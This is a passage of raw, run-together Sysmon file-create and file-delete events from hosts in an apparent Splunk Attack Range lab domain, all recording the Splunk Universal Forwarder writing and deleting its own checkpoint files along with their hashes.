Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3C1E9805453DBAFC3E449A736F82F6EE,SHA256=EFBFEC23E9AF19E74621A2A6EE121C5C99D7CA90D80BF6ED457F7C7A4A7A2870falsetrue 11241100x800000000000000057350878Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:32.121{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350877Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:32.121{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C594465523733B1FCD2E29420CE3006E,SHA256=8B2C8F6F5E7BA091BE29AE8657DE594BDC662A6E4097AEE02941B70474F018D6falsetrue 23542300x800000000000000021219997Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:33.891{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1108955E2F215E97AB2C4CBBF3D9BB6,SHA256=23543DFCBCBB809F6B0C0C2643546AFD4C7E3985028864A50F7559C8BB577210,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350883Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:33.138{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350882Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:33.138{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35D31696D6BB6551C667DF7EAD26C246,SHA256=DB86A127F8C2A851FB507AC22294B083144E7CBF8636DAE269877445AA1BB046falsetrue 11241100x800000000000000057350885Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:34.153{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350884Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:34.153{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59252BD95247246888E3CD3415FB78F5,SHA256=E0EDA239D1E23DC83F2E17A4754BFA5992A4A69C6553C5343AE9DFE06E751692falsetrue